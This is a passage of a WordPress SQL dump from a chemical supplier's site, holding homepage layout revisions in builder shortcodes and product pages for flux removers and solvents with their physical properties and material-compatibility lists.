id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1624"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-15 17:54:30', '2016-09-15 17:54:30', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1688, 3, '2016-09-15 17:57:40', '2016-09-15 17:57:40', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<h2>SINCE 1955</h2>\n\n[/text_box]\n[text_box position_y="20"]\n\n<h3><strong>Quality &amp; Service</strong></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MS-MEDICAL" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n[divider]\n\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1588" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1624"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-15 17:57:40', '2016-09-15 17:57:40', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1689, 3, '2016-09-15 18:04:09', '2016-09-15 18:04:09', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="85"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<h2>SINCE 1955</h2>\r\n[/text_box]\r\n[text_box position_y="20"]\r\n<h3><strong>Quality &amp; Service</strong></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MS-MEDICAL" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="4" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n[col span="4"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n[col span="4"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n[divider]\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1588" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1624"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-15 18:04:09', '2016-09-15 18:04:09', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1690, 2, '2016-09-15 18:15:05', '2016-09-15 18:15:05', '<h3><strong>MS-755L Heavy Duty Solvent &amp; Flux Remover</strong></h3>\r\nMS-755L is a low global warming formulation heavy duty solvent and flux remover. It is a strong cleaning agent ideally suited for removal of rosin, organic flux, oils, grease and waxes. It can be used for precision and specialty cleaning. Evaporates quickly and leaves no residue. It replaces n-PB and HCFC-225 in many applications.\r\n<h4><strong>ADVANTAGES OF MILLER-STEPHENSON FLUX REMOVERS</strong></h4>\r\n<ul>\r\n 	<li>Ultra Low Global Warming Potential</li>\r\n 	<li>Evaporates quickly</li>\r\n 	<li>Leaves no residue</li>\r\n 	<li>Safe for most plastics, <span style="font-size: 14.4px;">elastomers </span>and metals</li>\r\n 	<li><a href="http://www.rohsguide.com/">RoHS Compliant</a></li>\r\n</ul>\r\n<strong>PROPERTIES OF SOLVENT</strong>\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td width="250">Boiling Point</td>\r\n<td style="text-align: center;" width="206">90°F/32°C</td>\r\n</tr>\r\n<tr>\r\n<td>Liquid Density</td>\r\n<td style="text-align: center;">1.20 g/ml @ 77°F/25°C</td>\r\n</tr>\r\n<tr>\r\n<td>Ozone Depletion</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n<tr>\r\n<td>Global Warming Potential</td>\r\n<td style="text-align: center;">1.8</td>\r\n</tr>\r\n<tr>\r\n<td>VOC Content</td>\r\n<td style="text-align: center;">514 g/l</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>PLASTIC COMPATIBILITY</strong>\r\n(Immersion: 15 minutes at Room Temperature)\r\n<ul>\r\n 	<li>Acetal</li>\r\n 	<li>Polyethylene</li>\r\n 	<li>Polypropylene</li>\r\n 	<li>Liquid Crystal Polymer</li>\r\n 	<li>Polyester, PBT, PET</li>\r\n 	<li>Epoxy</li>\r\n 	<li>Polysulfone, PSO</li>\r\n 	<li>PEK, PEEK</li>\r\n 	<li>Polyimides</li>\r\n 	<li>Teflon™</li>\r\n 	<li>PTFE</li>\r\n 	<li>Phenolic</li>\r\n 	<li>Polyvinylchloride</li>\r\n</ul>\r\n<strong>ELASTOMER COMPATIBILITY</strong>\r\n(Immersion: 15 minutes at Room Temperature)\r\n<ul>\r\n 	<li>Butyl Rubber*</li>\r\n 	<li>Natural Rubber</li>\r\n 	<li>Polysulfide</li>\r\n 	<li>EPDM</li>\r\n 	<li>Buna S*</li>\r\n 	<li>Buna N</li>\r\n 	<li>Neoprene*</li>\r\n 	<li>Urethane</li>\r\n 	<li>Chlorosuflonated PE</li>\r\n 	<li>Silicone</li>\r\n 	<li>Fluoroelastomers</li>\r\n</ul>\r\n*Swelling, but with low extractables.\r\n\r\nElastomer swelling and shrinking will, in most cases, revert to within a few percent of original size after airdrying. Swell, shrinkage, and extractables are strongly affected by the compounding agents, plasticizers, and\r\ncuring used in the manufacture of the elastomers. Test for compatibility before use.\r\n\r\n<strong>METAL COMPATIBILITY</strong>\r\n(Immersion: 2 weeks at 248°F/120°C)\r\n<ul>\r\n 	<li>Aluminum</li>\r\n 	<li>Copper</li>\r\n 	<li>Iron</li>\r\n</ul>\r\nNote: Test for compatibility before use.\r\n\r\nTo learn more about Flux Removers contact us at support@mschem.com or call us.', 'MS-755L Flux Remover', '<strong>Removes Organic Flux, Oils, Grease and Wax.</strong>\r\n\r\nOur most aggressive cleaning agent for flux removal and heavy duty cleaning. It is suitable for removing ionic salts, organics flux, heavy industrial soils, wax and heavy grease. Evaporates quickly and leaves no residue. Low GWP (global warming potential).\r\n\r\n<img class="alignnone size-full wp-image-2766 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/LGW2.jpg" alt="lgw2" width="100" height="79" />', 'publish', 'open', 'closed', '', 'flux-remover-ms-755l', '', '', '2017-04-09 06:39:14', '2017-04-09 06:39:14', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1690', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1691, 2, '2016-09-15 18:14:50', '2016-09-15 18:14:50', '', 'flux remover', '', 'inherit', 'open', 'closed', '', 'ms-755l-flux-remover', '', '', '2016-10-27 15:57:49', '2016-10-27 15:57:49', '', 1690, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-755l-flux-remover.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1693, 2, '2016-09-15 18:22:24', '2016-09-15 18:22:24', '<h3>Flux Remover Spray Information</h3>\r\nA strong nonflammable flux remover spray containing a blend of hydrofluoroethers with trans-1, 2 dichloroethylene and isopropyl alcohol. This mixture is a blend of azeotropes. Ideally suited for removal of rosin, organic flux, oils, grease and waxes. Can also be used for precision and specialty cleaning. Evaporates quickly and leaves no residue. H0805B can be used in a vapor degreaser. It replaces nPB and HCFC-225 in many applications.\r\n<h4><strong>Advantages of Miller-Stephenson Flux Remover Spray: </strong></h4>\r\n<ul>\r\n 	<li>Evaporates quickly</li>\r\n 	<li>Leaves no residue</li>\r\n 	<li>Nonflammable</li>\r\n 	<li>Non ozone depleting</li>\r\n 	<li><a href="http://www.rohsguide.com/">RoHS Compliant</a></li>\r\n</ul>\r\n<strong>Properties of Solvent:</strong>\r\n\r\nBoiling Point.....................................................113°F/45°C\r\n\r\nVapor Pressure.................................................360 mm Hg\r\n\r\nLiquid Density...............................1.27 g/ml @ 70°F/21°C\r\n\r\nOzone Depletion...........................................................0.00\r\n\r\nGlobal Warming Potential, H0805A............................35.6\r\n\r\nH0805B............................43.0\r\n\r\n<strong>PLASTIC COMPATIBILITY:</strong>\r\n\r\n(Immersion: 15 minutes at Room Temperature)\r\n<ul>\r\n 	<li>Acetal</li>\r\n 	<li>Polyethylene</li>\r\n 	<li>Polypropylene</li>\r\n 	<li>Liquid Crystal Polymer</li>\r\n 	<li>Polyester, PBT, PET</li>\r\n 	<li>Epoxy</li>\r\n 	<li>Polysulfone, PSO</li>\r\n 	<li>PEK, PEEK</li>\r\n 	<li>Polyimides</li>\r\n 	<li>PTFE</li>\r\n 	<li>Phenolic</li>\r\n 	<li>Polyvinylchloride</li>\r\n</ul>\r\nNOTE: Acrylic, ABS, and polycarbonate, if under stress, may show slight cracking or crazing damage. Test for compatibility before use.\r\n\r\n<strong>ELASTOMER COMPATIBILITY:</strong>\r\n\r\n(Immersion: 15 mins at Room Temperature)\r\n<ul>\r\n 	<li>Butyl Rubber*</li>\r\n 	<li>Natural Rubber</li>\r\n 	<li>Polysulfide</li>\r\n 	<li>EPDM</li>\r\n 	<li>Buna S*</li>\r\n 	<li>Buna N</li>\r\n 	<li>Neoprene*</li>\r\n 	<li>Urethane</li>\r\n 	<li>Chlorosuflonated PE</li>\r\n 	<li>Silicone</li>\r\n 	<li>Fluoroelastomers</li>\r\n</ul>\r\nElastomer swelling and shrinking will, in most cases, revert to within a few percent of original size after air drying. Swell, shrinkage, and extractables are strongly affected by the compounding agents, plasticizers, and curing used in the manufacture of the elastomers. Test for compatibility before use.\r\n\r\n<strong>METAL COMPATIBILITY: </strong>\r\n\r\n(Immersion: 2 weeks at 248°F/120°C)\r\n<ul>\r\n 	<li>Aluminum</li>\r\n 	<li>Copper</li>\r\n 	<li>Iron</li>\r\n</ul>\r\nNote: Test for compatibility before use.\r\n\r\nThis product is nonflammable, odorless, and has a low order of toxicity.\r\n\r\nSafety Data Sheets (SDS) are available upon request.\r\n\r\nFor technical support: 800-992-2424 (8-4 E.T.) in the U.S.\r\n\r\n800-323-4621 (8-4 E.T.) in Canada.\r\n\r\nE-mail: : support@mschem.com', 'H0805A & H0B05B Flux Remover Spray', '<strong>Removes Organic Flux, Oils, Grease and Wax</strong>\r\n\r\nA strong, nonflammable cleaning agent containing an azeotrope blend of hydrofluoroethers with trans-1,2-dichloroethylene and isopropyl alcohol. It is ideally suited for removal of rosin, organic flux, oils, grease and waxes. Can be used for precision and specialty cleaning. Recommended for use in vapor degreasing equipment. Evaporates quickly and leaves no residue. Low GWP (global warming potential). No ODC (ozone depleting chemicals).', 'publish', 'open', 'closed', '', 'flux-remover-spray', '', '', '2017-04-10 13:18:48', '2017-04-10 13:18:48', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1693', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1694, 2, '2016-09-15 18:21:52', '2016-09-15 18:21:52', '', 'Flux Remover Spray', '', 'inherit', 'open', 'closed', '', 'ms-flux-remover', '', '', '2017-04-10 13:17:39', '2017-04-10 13:17:39', '', 1693, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ms-flux-remover.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1695, 2, '2016-09-15 18:28:22', '2016-09-15 18:28:22', '<h3>Flux Cleaner | MS-560 &amp; MS-562</h3>\r\nOur best no-clean flux cleaner and heavy duty cleaner. It is nonflammable and suitable for removing no-clean flux as well as oil, ionic salts, and particulate matter. Ideal for field service, production, and prototype work. Evaporates quickly and leaves no residue.\r\n<h4><strong>Advantages of MS-560 &amp; MS-562 Flux Cleaner:</strong></h4>\r\n<ul>\r\n 	<li>Evaporates quickly</li>\r\n 	<li>Leaves no residue</li>\r\n 	<li>Nonflammable</li>\r\n 	<li>Non ozone depleting</li>\r\n 	<li><a href="http://www.rohsguide.com/">RoHS Compliant</a></li>\r\n</ul>\r\n<h4><strong>PROPERTIES OF SOLVENT FLUX CLEANER:</strong></h4>\r\nBoiling Point…………………………….…… 99°F/37°C\r\n\r\nFlash Point……………………………………….….None\r\n\r\nLiquid Density…………………..1.25 g/ml @ 77°F/25°C\r\n\r\nOzone Depletion…………………………….………..0.00\r\n\r\n<strong>PLASTIC COMPATIBILITY:</strong>\r\n\r\n(Immersion: 15 minutes at Room Temperature)\r\n<ul>\r\n 	<li>Acetal</li>\r\n 	<li>Polyethylene</li>\r\n 	<li>Polypropylene</li>\r\n 	<li>Liquid Crystal Polymer</li>\r\n 	<li>Polyester, PBT, PET</li>\r\n 	<li>Epoxy</li>\r\n 	<li>Polysulfone, PSO</li>\r\n 	<li>PEK, PEEK</li>\r\n 	<li>Polyimides</li>\r\n 	<li>PTFE</li>\r\n 	<li>Phenolic</li>\r\n 	<li>Polyvinylchloride</li>\r\n</ul>\r\nNOTE: Acrylic, ABS, and polycarbonate, if under stress, may show slight cracking or crazing damage. Test for compatibility before use.\r\n\r\n<strong>ELASTOMER COMPATIBILITY:</strong>\r\n\r\n(Immersion: 15 minutes at Room Temperature)\r\n<ul>\r\n 	<li>Butyl Rubber*</li>\r\n 	<li>Natural Rubber</li>\r\n 	<li>Polysulfide</li>\r\n 	<li>EPDM</li>\r\n 	<li>Buna S*</li>\r\n 	<li>Buna N</li>\r\n 	<li>Neoprene*</li>\r\n 	<li>Urethane</li>\r\n 	<li>Chlorosuflonated PE</li>\r\n 	<li>Silicone</li>\r\n 	<li>Fluoroelastomers</li>\r\n</ul>\r\n*Swelling, but with low extractables.\r\n\r\nElastomer swelling and shrinking will, in most cases, revert to within a few percent of original size after air drying. Swell, shrinkage, and extractables are strongly affected by the compounding agents, plasticizers, and curing used in the manufacture of the elastomers. Test for compatibility before use.\r\n\r\n<strong>METAL COMPATIBILITY:</strong>\r\n\r\n(Immersion: 2 weeks at 248°F/120°C)\r\n<ul>\r\n 	<li>Aluminum</li>\r\n 	<li>Copper</li>\r\n 	<li>Iron</li>\r\n</ul>\r\nNote: Test for compatibility before use. This product is nonflammable, odorless, and has a low order of toxicity.\r\n\r\nSafety Data Sheets (SDS) are available upon request.\r\n\r\nFor technical support: 800-992-2424 (8-4 E.T.) in the U.S. 800-323-4621 (8-4 E.T.) in Canada.\r\n\r\nE-mail: support@mschem.com\r\n\r\n&nbsp;', 'MS-560 & MS-562 Flux Cleaner', '<strong>Removes no-clean flux as well as oil, ionic salts, and particulate matter.</strong>\r\n\r\nOur best no-clean flux remover and heavy duty cleaner. It is nonflammable and suitable for removing no-clean flux well as oil, ionic salts, and particulate matter. Ideal for field service, production, and prototype work. Evaporates quickly and leaves no residue.', 'publish', 'open', 'closed', '', 'flux-cleaner-ms-560-ms-562', '', '', '2017-04-09 06:03:41', '2017-04-09 06:03:41', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1695', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1696, 2, '2016-09-15 18:27:37', '2016-09-15 18:27:37', '', 'Flux Cleaner', '', 'inherit', 'open', 'closed', '', 'miller-stephenson-flux-remover', '', '', '2017-04-09 05:55:59', '2017-04-09 05:55:59', '', 1695, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/miller-stephenson-flux-remover.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1697, 2, '2016-09-15 18:39:21', '2016-09-15 18:39:21', '<h3><strong>Miller-Stephenson Flux Removers</strong></h3>\r\nStrong flux removers, cleaning agent containing a Hydrofluoroether azeotrope, ideally suited for removal of rosin, organic flux, oils, grease and waxes. They also can be used for precision and specialty cleaning. Evaporates quickly and leaves no residue. It replaces HCFC-225 in many applications.\r\n\r\nAdvantages of Miller-Stephenson Flux Removers:\r\n<ul>\r\n 	<li>Evaporates quickly</li>\r\n 	<li>Leaves no residue</li>\r\n 	<li>Non ozone-depleting</li>\r\n 	<li><a href="http://www.rohsguide.com/">RoHS Compliant</a></li>\r\n</ul>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'MS-725/727 Flux Removers', '<strong>Removes Organic Flux, Heavy Oils, Greases and Wax</strong>\r\n\r\nA strong, cleaning agent containing a hydrofluoroether azeotrope, ideally suited for removal of rosin, organic flux, oils, grease and waxes. Can also be used for precision and specialty cleaning. When used in bulk form, low surface tension, and constant composition during boiling make this product highly suitable for immersion and vapor degreasing equipment. No ODC (ozone depleting chemicals).', 'publish', 'open', 'closed', '', 'flux-removers-ms-755-ms-757', '', '', '2017-04-10 04:22:56', '2017-04-10 04:22:56', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1697', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1698, 2, '2016-09-15 18:39:01', '2016-09-15 18:39:01', '', 'miller-stephenson-flux-remover-solvent', '', 'inherit', 'open', 'closed', '', 'miller-stephenson-flux-remover-solvent', '', '', '2016-09-15 18:39:01', '2016-09-15 18:39:01', '', 1697, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/miller-stephenson-flux-remover-solvent.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1699, 2, '2017-04-07 17:46:20', '2017-04-07 17:46:20', '<h3><strong>Heavy Duty Solvent &amp; Flux Remover | SolvSys™ MS-555 (Aerosol) </strong><strong>MS-557 (Bulk Liquid)</strong></h3>\nOur most aggressive flux remover and heavy duty solvent. A superior solvent for flux removal and heavy duty cleaning. Suitable for removing oil, ionic salts, and particulate matter. Ideal for field service, production, and prototype work. Evaporates quickly and leaves no residue. It replaces n-PB and HCFC-225 in many applications.\n\n<strong>ADVANTAGES:</strong>\n<ul>\n 	<li>Evaporates quickly</li>\n 	<li>Leaves no residue</li>\n 	<li>Non ozone-depleting</li>\n 	<li>RoHS Compliant</li>\n</ul>\n<strong>PROPERTIES OF SOLVENT:</strong>\n\nBoiling Point………………………………… 95°F/34°C\n\nLiquid Density…………………..1.28 g/ml @ 77°F/25°C\n\nOzone Depletion……………………………………..0.00\n\n<strong>PLASTIC COMPATIBILITY:</strong>\n\n<span style="font-size: 14.4px;">(Immersion: 15 minutes at Room Temperature)</span>\n<ul>\n 	<li>Acetal</li>\n 	<li>Polyethylene</li>\n 	<li>Polypropylene</li>\n 	<li>Liquid Crystal Polymer</li>\n 	<li>Polyester, PBT, PET</li>\n 	<li>Epoxy</li>\n 	<li>Polysulfone, PSO</li>\n 	<li>PEK, PEEK</li>\n 	<li>Polyimides</li>\n 	<li>PTFE</li>\n 	<li>Phenolic</li>\n 	<li>Polyvinylchloride</li>\n</ul>\nNOTE: Acrylic, ABS, and polycarbonate, if under stress, may show slight cracking or crazing damage. Test for compatibility before use.\n\n<strong>ELASTOMER COMPATIBILITY:</strong>\n\n(Immersion: 15 mins at Room Temperature)\n<ul>\n 	<li>Butyl Rubber*</li>\n 	<li>Natural Rubber</li>\n 	<li>Polysulfide</li>\n 	<li>EPDM</li>\n 	<li>Buna S*</li>\n 	<li>Buna N</li>\n 	<li>Neoprene*</li>\n 	<li>Urethane</li>\n 	<li>Chlorosuflonated PE</li>\n 	<li>Silicone</li>\n 	<li>Fluoroelastomers</li>\n</ul>\n*Swelling, but with low extractables.\n\nElastomer swelling and shrinking will, in most cases, revert to within a few percent of original size after air drying. Swell, shrinkage, and extractables are strongly affected by the compounding agents, plasticizers, and curing used in the manufacture of the elastomers. Test for compatibility before use.\n\n<strong>METAL COMPATIBILITY:</strong>\n\n(Immersion: 2 weeks at 248°F/120°C)\n<ul>\n 	<li>Aluminum</li>\n 	<li>Copper</li>\n 	<li>Iron</li>\n</ul>\nNote: Test for compatibility before use.\n\nSafety Data Sheets (SDS) are available upon request.', 'MS-555/557', '<strong>Removes Organic Flux, Ionic Salts and Oil.</strong>\n\nOur most aggressive flux remover. An, economical and superior solvent for flux removal and heavy duty cleaning. Suitable for removing oil, ionic salts and particulate matter. Removes all types of organic flux. Excellent for spot flux removal. Ideal for field service, production and prototype work. Evaporates quickly and leaves no residue. No ODC (ozone depleting chemicals).', 'inherit', 'closed', 'closed', '', '1384-autosave-v1', '', '', '2017-04-07 17:46:20', '2017-04-07 17:46:20', '', 1384, 'https://132.148.10.86/wordpress/1384-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1700, 2, '2016-09-15 19:01:44', '2016-09-15 19:01:44', '', 'flux-removers', '', 'inherit', 'open', 'closed', '', 'flux-removers-2', '', '', '2016-09-15 19:01:44', '2016-09-15 19:01:44', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/flux-removers-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
